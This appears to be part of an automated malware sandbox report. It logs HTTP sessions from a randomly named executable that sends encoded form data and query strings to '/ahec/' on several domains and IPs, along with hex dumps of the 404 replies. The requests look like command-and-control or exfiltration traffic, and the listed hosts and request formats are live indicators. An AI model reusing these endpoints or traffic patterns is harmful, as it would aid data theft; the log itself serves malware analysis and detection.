                                                                        Data Ascii: Ot=fGFjl9hS4wS+jzYjgepxbBFbsNO2Tg2LVeb1efM1x9JamnDy0j77CyWHgBlXeKhJrXrukhqnjc4Mpop2ZHfoN3giv9abyFb2P+jY+/8kV7oOiq+tD4twq0BafnZSaf8pymAPU4rjZaYg6s/92sFWI6C1vHdsMHCGj+0Brk0U0QDn7VqOa+E0amBog9bABb2+coGKeab5yp2YyWb184ThLvjY3ulIcd6/PcbbN0lmREtFY6ZOHrvEKSluQcmBHNsCDwilEb9WCW2ClBX3O1DslWA7scx9h3oKZat8B0flsvnTmsuJ1x2mPs4Be/4gzL6tDd49SV66t9XkIMllkJYJDMgjpd/k99jf+3yIjOl6fnEhVKdjLLV4foUmKLiHMUjagZMI59GPGnXYDXjpXOU0VJvvj6eUh8GF9nKd9nzc4BHKfoWpQ6t8d2uyWGuOu9I2Z6OpkryzPnHCX38hJuavoHTeMcdIHrphNFCiKvBkjz6JREOFDIEjGujbWHpjlrDG0j3CT2BUIoxV0hVpi1H5B8C16JAkIucCyRXvT5OsqN750zGKOBEjrkLswJanItcN2lwrYV+tyCoGfwrOhfDd+uiwEhYM2tS8rLmnlcalPPdBlG40N+rWTR5CKXv2jyDMx6oj3GYxF96FV4AndGjJ6AcA1I4OSbmd/qVlZDeeQLMn8H59K9UyxDDTfoekMBg7QHaMyoWxkFVswYDc89B1KiBAP4QKmCnIsckmopRLLOfmixlkqkyZLMB7yAoJl+qOPpfcu8bdHGWICf3NS6xm0IwuLtOxYRvelpiSWl9IgbMqBwviVpsureynr/5kPzuwwzVeGt3VpVThdoe5XQw0TU/bTtMjVX3EoOYpcMi0P632Rg8D39KPg4XJaUaK8Ee36IBkcJPT+TemZdXuLNh2yR0we5UYcLCc/+NRE1puA3NdbXOch/KwWYQt/N359HS0s4mKZmscnTle9MJgIT4U0zLk3Pk9REEeOIXEsRfczYd1WrkI+F3qBCX4SKuJokdnTfri2v4Dy6/6h3n893EVmj8Bf1odPxfEL1m3z/j53Vo/voJz0I+o9riK8SmMbKx19fRhbedZ7nNFzlPY1PtkOjAYnlDaky2oPZKMDqE6wPcc5r1tDZ51e17hmng6otZpmOl6NDnbFYPEKvUcXBA7q+OeZLdWcR/wKDqNsmQaQeMd+ROoQuAOpVYY/tqe
                                                                        Dec 2, 2023 18:50:14.057214975 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:50:13 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.1049728131.153.147.90805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:50:16.788357019 CET515OUTGET /ahec/?Ot=SEtDmKR01RO/v1cj8toEclhnh+z+cFCFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7dClcm7p6TyxSZVg==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.instantconvey.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:50:16.890762091 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:50:16 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.2.104972994.23.162.163805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:50:22.377563953 CET816OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.domainappraisalbot.com
                                                                        Origin: http://www.domainappraisalbot.com
                                                                        Referer: http://www.domainappraisalbot.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 57 44 52 70 51 76 58 4c 66 35 4b 62 7a 44 68 65 38 73 5a 4b 48 2b 6e 4e 73 46 4f 30 62 34 78 35 6c 45 74 72 6d 5a 72 57 4b 4b 45 62 32 47 72 2b 70 5a 41 63 35 44 6a 41 77 37 51 59 66 43 48 58 41 31 77 59 33 33 32 74 54 5a 6b 33 55 63 47 30 76 63 49 61 77 4c 38 37 4e 44 64 41 36 34 32 75 71 6d 51 32 45 79 72 7a 46 69 4f 6b 68 39 6f 31 37 6a 55 57 67 50 73 53 45 66 2b 35 5a 67 43 38 36 4c 63 49 58 61 56 6b 6f 33 37 4b 72 4d 50 6f 61 63 6f 54 33 6f 6b 55 50 79 46 6c 31 35 31 46 75 56 68 59 70 6a 30 69 4b 79 50 32 32 43 6f 75 5a 41 3d 3d
                                                                        Data Ascii: Ot=WDRpQvXLf5KbzDhe8sZKH+nNsFO0b4x5lEtrmZrWKKEb2Gr+pZAc5DjAw7QYfCHXA1wY332tTZk3UcG0vcIawL87NDdA642uqmQ2EyrzFiOkh9o17jUWgPsSEf+5ZgC86LcIXaVko37KrMPoacoT3okUPyFl151FuVhYpj0iKyP22CouZA==


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        18192.168.2.104973094.23.162.163805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:50:25.074394941 CET836OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.domainappraisalbot.com
                                                                        Origin: http://www.domainappraisalbot.com
                                                                        Referer: http://www.domainappraisalbot.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 57 44 52 70 51 76 58 4c 66 35 4b 62 70 69 52 65 77 74 5a 4b 47 65 6e 4f 77 56 4f 30 55 59 78 39 6c 44 6c 72 6d 63 54 47 4a 34 51 62 34 44 58 2b 6f 59 41 63 2b 44 6a 41 37 62 51 64 62 43 47 36 41 31 4d 68 33 7a 32 74 54 5a 67 33 55 64 32 30 6f 71 41 5a 79 62 38 39 43 6a 64 47 33 59 32 75 71 6d 51 32 45 79 2f 4a 46 6d 69 6b 6d 4d 59 31 36 47 30 58 68 50 73 52 53 50 2b 35 64 67 43 34 36 4c 63 32 58 65 56 4f 6f 31 7a 4b 72 4a 6a 6f 5a 4e 6f 55 35 6f 6b 61 46 53 46 37 38 4a 73 38 31 57 6c 71 71 68 63 30 55 6d 65 64 2b 33 45 39 65 30 38 50 4f 79 73 6a 44 56 56 5a 6a 5a 39 6d 6f 61 66 41 73 4a 73 3d
                                                                        Data Ascii: Ot=WDRpQvXLf5KbpiRewtZKGenOwVO0UYx9lDlrmcTGJ4Qb4DX+oYAc+DjA7bQdbCG6A1Mh3z2tTZg3Ud20oqAZyb89CjdG3Y2uqmQ2Ey/JFmikmMY16G0XhPsRSP+5dgC46Lc2XeVOo1zKrJjoZNoU5okaFSF78Js81Wlqqhc0Umed+3E9e08POysjDVVZjZ9moafAsJs=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        19192.168.2.104973194.23.162.163805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:50:27.782480001 CET1849OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.domainappraisalbot.com
                                                                        Origin: http://www.domainappraisalbot.com
                                                                        Referer: http://www.domainappraisalbot.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 57 44 52 70 51 76 58 4c 66 35 4b 62 70 69 52 65 77 74 5a 4b 47 65 6e 4f 77 56 4f 30 55 59 78 39 6c 44 6c 72 6d 63 54 47 4a 35 6f 62 34 31 6a 2b 70 37 6f 63 2f 44 6a 41 30 4c 51 63 62 43 47 43 41 31 55 6c 33 7a 7a 59 54 62 6f 33 56 37 69 30 70 59 6f 5a 6f 4c 38 39 41 6a 64 48 36 34 32 2f 71 69 38 36 45 78 48 4a 46 6d 69 6b 6d 50 77 31 71 6a 55 58 73 76 73 53 45 66 2b 31 5a 67 43 51 36 4c 45 41 58 65 59 35 6f 42 48 4b 71 74 44 6f 56 66 41 55 6d 34 6b 50 43 53 45 6f 38 4a 51 64 31 51 42 63 71 68 70 6a 55 6c 4f 64 2f 7a 35 41 4c 33 63 33 63 78 4d 34 46 6d 70 42 6b 38 4d 42 73 59 2b 45 36 75 47 4d 4d 74 65 54 4c 36 56 33 6a 66 62 44 67 72 47 57 75 55 6f 61 6c 2f 39 41 72 33 57 6f 68 36 4c 79 4e 44 49 70 47 57 4c 35 74 6c 6d 56 59 38 41 4b 6f 68 7a 38 33 37 68 69 38 48 31 44 67 69 34 49 70 50 54 43 34 61 4d 4b 48 39 51 37 4a 38 5a 75 4b 4b 54 49 65 78 67 78 30 33 70 78 30 4c 4b 47 6e 6a 4d 52 76 39 4f 64 46 6c 68 4c 77 6b 39 54 58 6b 69 32 35 57 68 77 33 54 47 47 6c 77 5a 59 49 33 37 50 77 53 53 66 74 71 4b 68 32 79 42 48 46 68 52 7a 4f 5a 4d 47 33 50 52 37 4f 2f 33 36 42 58 65 70 58 66 35 45 57 54 30 4f 56 53 38 53 47 44 61 49 54 31 71 4a 32 51 79 76 43 7a 57 41 4a 70 6b 6f 66 47 30 4a 39 44 75 43 39 35 61 6f 53 35 65 38 63 53 74 38 7a 32 7a 72 74 54 6e 47 55 44 35 2f 41 79 4a 72 4b 75 2b 53 45 75 39 49 78 56 42 67 53 53 44 57 49 32 6c 55 44 42 77 7a 66 50 4e 57 4b 6d 44 5a 42 36 52 58 44 45 76 38 57 32 52 6b 71 34 61 46 4e 52 50 38 48 67 4e 56 63 6b 75 47 66 47 57 41 41 67 65 6f 64 4a 43 65 39 45 76 61 61 58 70 6f 68 6d 56 63 42 61 76 51 65 4b 67 70 78 46 48 6c 33 33 47 43 6d 2f 61 50 59 68 43 6d 48 6c 47 48 58 70 64 43 32 2f 66 63 34 68 61 5a 7a 67 66 75 5a 6b 52 72 51 77 33 43 41 58 31 43 77 5a 78 71 49 53 4d 35 69 74 47 58 51 66 2b 30 32 68 58 75 59 79 59 69 54 37 4f 50 6f 46 56 61 63 41 39 30 68 35 36 4b 6d 6c 41 53 31 54 4c 78 6f 32 6a 52 56 35 75 38 58 34 35 42 52 46 49 2b 5a 41 32 57 4b 48 35 31 46 64 2b 39 34 76 4f 42 49 7a 57 67 68 35 77 4c 51 4f 50 61 75 66 48 51 76 46 4c 55 2b 47 35 39 4d 2b 63 74 73 30 75 71 44 71 63 33 4e 32 5a 75 75 31 71 70 72 6e 76 71 78 6c 51 79 44 7a 36 61 6a 49 35 52 32 6d 51 75 71 48 6b 78 39 30 44 75 54 73 74 6e 47 54 65 70 68 38 71 4e 53 6e 38 36 57 37 6f 66 66 74 70 43 50 4f 2f 74 59 79 53 7a 36 4e 38 32 43 66 48 42 33 58 73 35 6f 4e 48 71 53 6e 63 52 66 47 64 31 44 4d 2f 74 4c 48 58 54 32 59 38 77 73 66 39 6f 79 30 49 58 76 43 6d 63 54 70 52 50 65 47 6b 30 35 45 67 71 63 73 36 32 61 2b 43 30 43 79 67 71 51 50 4c 36 38 58 4d 5a 52 38 4d 2f 2f 6d 57 37 5a 36 58 54 73 4c 72 51 6a 6b 64 7a 41 65 75 64 38 67 44 62 54 32 59 36 39 42 5a 44 59 32 4d 6d 39 52 52 67 51 63 69 72 72 6e 33 34 64 6b 42 66 2f 64 53 41 4f 32 7a 57 6a 46 37 6d 62 4b 75 31 62 6d 50 75 43 76 51 6d 6b 76 69 45 47 63 75 64 63 65 55 50 67 69 6f 6f 79 42 53 30 55 72 35 62 48 4a 58 6c 77 6b 32 78 37 34 42 30 61 53 49 59 67 59 31 6d 7a 71 35 59 67 64 30 36 34 32 2f 6a 53 30 41 45 2b 76 65 46 33 37 56 57 53 4c 4a 31 71 58 50 58 4b 45 63 49 45 4f 31 71 53 44 68 6a 70 72 56 63 5a 53 76 5a 39 39 58 6d 77 63 79 54 6f 65 6e 72 51 36 4a 69 53 55 6c 4a 76 75 36 44 4e 4e 74 57 75 44 56 6b 69 54 69 37 42 6a 66 79 44 43 7a 65 34 76 36 75 33 6b 49 57 32 70 77 45 34 32 7a 76 42 34 55 73 46 71 44 65 6d 78 6f 53 4c 34 52 61 4f 4b 56 57 5a 46 30 67 70 38 55 53 70 6d 52 32 76 42 5a 4d 47 67 58 4d 64 50 79 56 43 42 52 35 2b 75 61 4d 51 58 39 59 68 72 71 58 30 57 54 55 63 2f 6e 62 31 59 74 66 6a 5a 63 6b 79 55 58 70 73 56 2b 76 63 6b 59 48 77 79 79 74 35 61 45 30 49 30 6d 63 50 30 34 55 41 70 59 75 50 70 6d 68 52 63 59 47 34 53 75 54 45 30 74 62 75 53 49 32 75 59 51 5a 66 2f 55 51 41 69 46 77
                                                                        Data Ascii: Ot=WDRpQvXLf5KbpiRewtZKGenOwVO0UYx9lDlrmcTGJ5ob41j+p7oc/DjA0LQcbCGCA1Ul3zzYTbo3V7i0pYoZoL89AjdH642/qi86ExHJFmikmPw1qjUXsvsSEf+1ZgCQ6LEAXeY5oBHKqtDoVfAUm4kPCSEo8JQd1QBcqhpjUlOd/z5AL3c3cxM4FmpBk8MBsY+E6uGMMteTL6V3jfbDgrGWuUoal/9Ar3Woh6LyNDIpGWL5tlmVY8AKohz837hi8H1Dgi4IpPTC4aMKH9Q7J8ZuKKTIexgx03px0LKGnjMRv9OdFlhLwk9TXki25Whw3TGGlwZYI37PwSSftqKh2yBHFhRzOZMG3PR7O/36BXepXf5EWT0OVS8SGDaIT1qJ2QyvCzWAJpkofG0J9DuC95aoS5e8cSt8z2zrtTnGUD5/AyJrKu+SEu9IxVBgSSDWI2lUDBwzfPNWKmDZB6RXDEv8W2Rkq4aFNRP8HgNVckuGfGWAAgeodJCe9EvaaXpohmVcBavQeKgpxFHl33GCm/aPYhCmHlGHXpdC2/fc4haZzgfuZkRrQw3CAX1CwZxqISM5itGXQf+02hXuYyYiT7OPoFVacA90h56KmlAS1TLxo2jRV5u8X45BRFI+ZA2WKH51Fd+94vOBIzWgh5wLQOPaufHQvFLU+G59M+cts0uqDqc3N2Zuu1qprnvqxlQyDz6ajI5R2mQuqHkx90DuTstnGTeph8qNSn86W7offtpCPO/tYySz6N82CfHB3Xs5oNHqSncRfGd1DM/tLHXT2Y8wsf9oy0IXvCmcTpRPeGk05Egqcs62a+C0CygqQPL68XMZR8M//mW7Z6XTsLrQjkdzAeud8gDbT2Y69BZDY2Mm9RRgQcirrn34dkBf/dSAO2zWjF7mbKu1bmPuCvQmkviEGcudceUPgiooyBS0Ur5bHJXlwk2x74B0aSIYgY1mzq5Ygd0642/jS0AE+veF37VWSLJ1qXPXKEcIEO1qSDhjprVcZSvZ99XmwcyToenrQ6JiSUlJvu6DNNtWuDVkiTi7BjfyDCze4v6u3kIW2pwE42zvB4UsFqDemxoSL4RaOKVWZF0gp8USpmR2vBZMGgXMdPyVCBR5+uaMQX9YhrqX0WTUc/nb1YtfjZckyUXpsV+vckYHwyyt5aE0I0mcP04UApYuPpmhRcYG4SuTE0tbuSI2uYQZf/UQAiFw


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        20192.168.2.104973294.23.162.163805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:50:30.486798048 CET520OUTGET /ahec/?Ot=bB5JTYLqXbmN0Rh+5NINP+PQjDS0UbZCl3xm8ZfdPOYVrj3MpZEcwx/57KsfYAKqEjFN/H+DNeQWefm4mYcz+JoJDCs0w/OhmA==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.domainappraisalbot.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:50:30.667097092 CET391INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                        Date: Sat, 02 Dec 2023 17:50:30 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 178
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        21192.168.2.104973366.29.155.54805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:50:36.541908979 CET786OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.nesmalt.info
                                                                        Origin: http://www.nesmalt.info
                                                                        Referer: http://www.nesmalt.info/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 4f 52 44 6d 59 6c 34 34 41 45 53 77 6b 46 2b 42 33 79 62 78 4f 31 2b 77 55 48 4e 49 48 46 46 67 43 52 31 69 73 55 56 45 7a 34 31 6c 4d 69 68 63 44 6f 63 61 65 6a 76 76 42 4d 4b 4c 41 67 46 64 43 67 6a 63 4f 67 34 58 55 4f 75 55 47 66 36 33 33 58 70 57 62 4d 7a 69 56 37 4c 55 4b 67 6b 44 50 41 62 4d 74 38 6b 4a 59 47 4f 69 73 37 69 74 61 34 78 32 6d 7a 59 39 79 6e 58 45 6a 70 4f 30 2f 39 4d 77 48 74 73 76 2f 76 61 64 61 36 4c 51 41 57 69 62 77 6a 6f 64 43 65 43 38 75 36 31 43 65 62 47 79 54 62 4b 49 63 58 34 47 32 6b 74 6a 6b 51 3d 3d
                                                                        Data Ascii: Ot=ORDmYl44AESwkF+B3ybxO1+wUHNIHFFgCR1isUVEz41lMihcDocaejvvBMKLAgFdCgjcOg4XUOuUGf633XpWbMziV7LUKgkDPAbMt8kJYGOis7ita4x2mzY9ynXEjpO0/9MwHtsv/vada6LQAWibwjodCeC8u61CebGyTbKIcX4G2ktjkQ==
                                                                        Dec 2, 2023 18:50:36.837861061 CET1340INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:50:36 GMT
                                                                        Server: Apache
                                                                        Content-Length: 5278
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 